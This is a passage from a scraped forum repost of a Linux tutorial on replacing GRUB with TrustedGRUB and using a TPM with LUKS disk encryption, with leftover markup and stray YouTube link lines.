</p><p> </p><p>To install TrustedGRUB to your local hard disc do: </p><p> </p><p> 'rm -rf /boot/grub/stage*' </p><p> 'rm -rf /boot/grub/*1_5' </p><p> 'cp default /boot/grub' </p><p> 'cd TrustedGRUB-1.1.5' </p><p> 'cp stage1/stage1 /boot/grub' </p><p> 'cp stage2/stage2 /boot/grub' </p><p> './grub/grub --no-floppy' </p><p>Then enter: </p><p> root (hdX,Y) </p><p> setup (hdX) </p><p> quit </p><p> </p><p>or alternatively </p><p> 'rm -rf /boot/grub/stage*' </p><p> 'rm -rf /boot/grub/*1_5' </p><p> './TrustedGRUB-1.1.5/util/grub-install /dev/XXX --no-floppy' </p><p>[/TD] [/TR] [/TABLE] We can see that the TrustedGRUB was successfully configured and compiled. To replace our old GRUB with the new TrustedGRUB, we need to remove the old GRUB from the system and install the new TrustedGRUB. We can do that with issuing the commands below: [TABLE] [TR] [TD=class: code]</p><p># emerge -C grub </p><p># cd TrustedGRUB-1.1.5/ </p><p># make install </p><p>[/TD] [/TR] [/TABLE] The first command removes the system GRUB, while the second command installs the new TrustedGRUB. Afterwards we need to copy some files needed for the boot process to the /boot partition. First we’ll make a backup of the old /boot partition, and afterwards overwrite some files with new ones. Let’s create a backup: [TABLE] [TR] [TD=class: code]</p><p># cp -r /boot /boot2 </p><p>[/TD] [/TR] [/TABLE] And copy some of the files from TrustedGRUB to the new /boot partition (the old files are still there, so we need to overwrite those): [TABLE] [TR] [TD=class: code]</p><p># cp ../default /boot/grub/ </p><p># cp stage1/stage1 /boot/grub </p><p># cp stage2/stage2 /boot/grub </p><p>[/TD] [/TR] [/TABLE] The only thing left is to actually install grub, which can be done by entering the grub command: [TABLE] [TR] [TD=class: code]# grub grub> root(hd0,0) grub> setup(hd0) grub> exit[/TD] [/TR] [/TABLE] Then we can restart the system to see if everything works as expected. If the system boots normally, then everything is ok. Since the TPM doesn’t do anything by itself, but requires the software that supports the TPM to control it, it’s redundant to mention that we must configure TrustedGRUB to use the TPM. The TrustedGRUB supports additional functionality: the checkfile and the pcr_verify options. The checkfile option allows us to specify the grub.conf file and additional files and programs to check at startup. Grub will extend one of the PCR registers with a SHA1 of the specified files. 3. Conclusion TPM provides a hardware support that holds the keys, which can be used to prove that the platform is trusted and the operating system can be booted securely. We can use TPM with LUKS in Linux, where the LUKS key can be written into TPM and then set-up a TrustedGRUB, which would unlock the sealed key. The /etc/crypttab in initrd should retrieve the key from TPM and boot the system securely, which is why we need to include tpm-tools into the initrd. We must also mention that LUKS is compatible with TPM in Linux, whereas the TrueCrypt still isn’t. Not to mention that the Linux version of TrueCrypt doesn’t even have the option to encrypt the whole partition, while the LUKS is a champion in doing that. Sursa InfoSec Resources
  22. http://www.youtube.com/watch?v=pxJb-F0AN14&feature=player_embedded Sursa YouTube
  23. Sursa YouTube
×
×
  • Create New...